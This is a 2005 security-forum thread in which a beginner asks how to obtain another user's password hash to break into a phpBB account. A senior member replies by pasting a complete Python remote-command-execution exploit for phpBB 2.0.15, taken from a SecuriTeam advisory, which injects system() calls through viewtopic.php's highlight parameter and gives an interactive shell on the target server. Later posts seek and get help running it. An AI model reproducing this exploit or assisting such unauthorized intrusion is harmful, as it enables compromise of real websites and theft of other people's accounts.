Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 15, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 239
Members: 1
Total: 240

Online Now:
01: kolaz - Homepage
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb 2.0.13 md5 hash...how to get?
Post new topic  Reply to topic View previous topic :: View next topic 
phpbb 2.0.13 md5 hash...how to get?
PostPosted: Mon Sep 12, 2005 9:57 pm Reply with quote
britshick
Beginner
Beginner
 
Joined: Sep 13, 2005
Posts: 2




alright, I'm brand new to hacking phpbb(my first day) and I'm trying to hack into an account on a phpBB 2.0.13 board.
I used waraxe's tutorial it was very good and understandable and I was able to log onto my own account through my friend's computer useing that method, but only b/c I figured out where to get my own md5 hash. but what I can't figure out is how to get the target's hash...
sorry if this a completely noob question but I've seriously been looking for hours and can't find anything that tells me how to (I am very ADD so I may have read it but it just didn't register Sad )

so how do I "Get target password's md5 hash"? for phpbb 2.0.13...

is getting a copy of the database and looking it up the only way to get it?
View user's profile Send private message
PostPosted: Tue Sep 13, 2005 11:47 am Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




Here is an exploit for phpBB 2.0.15. If you don?t know how to use: learn. Smile
Code:
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

phpBB Remote PHP Code Execution (viewtopic.php 2)

"phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package".

The following exploit code utilizes a vulnerability in phpBB to cause phpBB to execute arbitrary code.

Vulnerable Systems:
 * phpBB version 2.0.15

#!/usr/bin/pyth0n
#
################################ this exploit for
                                                              # phpBB 2.0.15
print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell,
print " 2005 by rattle@awarenetwork.org" # rather than
print " well, just because there is none." # sending a single
                                                              # command.
import sys ##
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

INITTAG = '<g0>'
ENDTAG = '</g0>'

def makecmd(cmd):
    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))


_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"


def usage():
    print """Usage: %s <forum> <topic>
 
    forum - fully qualified url to the forum
            example: http://www.host.com/phpBB/

    topic - ID of an existing topic. Well you
            will have to check yourself.

"""[:-1] % sys.argv[0]; sys.exit(1)


if __name__ == '__main__':

    if len(sys.argv) < 3 or not sys.argv[2].isdigit():
        usage()
    else:
        print
        url = sys.argv[1]
        if url.count("://") == 0:
            url = "http://" + url
        url = list(urlparse(url))
        host = url[1]
        if not host: usage()

        if not url[0]: url[0] = 'http'
        if not url[2]: url[2] = '/'
        url[3] = url[4] = url[5] = ''

        url = urlunparse(url)
 if url[-1] != '/': url += '/'

        topic = quote_plus((sys.argv[2]))

        while 1:

            try:
                cmd = raw_input("[%s]$ " % host).strip()
                if cmd[-1]==';': cmd=cmd[:-1]

                if (cmd == "exit"): break
                else: cmd = makecmd(cmd)
 
  out = _ex % (url,topic,cmd)

                try: ret = urlopen(Request(out)).read()
                except KeyboardInterrupt: continue
                except: pass

                else:
                    ret = ret.split(INITTAG,1)
                    if len(ret)>1: ret = ret[1].split(ENDTAG,1)
                    if len(ret)>1:
                        ret = ret[0].strip();
                        if ret: print ret
                        continue;

                print "EXPLOIT FAILED"

            except:
                continue

Additional Information:
The information has been provided by rattle.
The original article can be found at: http://www.milw0rm.com/id.php?id=1076

================================================================================





This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: html-list-unsubscribe@securiteam.com
In order to subscribe to the mailing list and receive advisories in HTML format, simply forward this email to: html-list-subscribe@securiteam.com

================================================================================
================================================================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Tue Sep 13, 2005 12:37 pm Reply with quote
britshick
Beginner
Beginner
 
Joined: Sep 13, 2005
Posts: 2




Shocked looks like i've got a lot of learning to do. Smile
thanks!
View user's profile Send private message
PostPosted: Thu Sep 29, 2005 11:41 pm Reply with quote
Dangerous
Beginner
Beginner
 
Joined: Sep 30, 2005
Posts: 2




Can I get a little help running this?
View user's profile Send private message
PostPosted: Sat Oct 01, 2005 6:03 am Reply with quote
Matt
Regular user
Regular user
 
Joined: Jul 30, 2005
Posts: 7




Hey

I know how to save it as a perl script.
I have a website that is perl enabled.
I tried uploading the script and running it, but I always get this server error thing.
I usually get that with php scripts when the directory is chmod to 777, but the dir had a chmod of 555 I think
It was fine.

It says the dir to perl is /usr/bin/perl
but i dont have that directory on my server.

Whats going on?

thx
-Matt
View user's profile Send private message MSN Messenger
PostPosted: Sat Oct 01, 2005 10:14 am Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




Matt wrote:
Hey

I know how to save it as a perl script.
I have a website that is perl enabled.
I tried uploading the script and running it, but I always get this server error thing.
I usually get that with php scripts when the directory is chmod to 777, but the dir had a chmod of 555 I think
It was fine.

It says the dir to perl is /usr/bin/perl
but i dont have that directory on my server.

Whats going on?

thx
-Matt


Matt, it isn't a perl script! It's a python script so install python on your computer and try again. Razz

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
phpbb 2.0.13 md5 hash...how to get?
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Movie Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.083 Seconds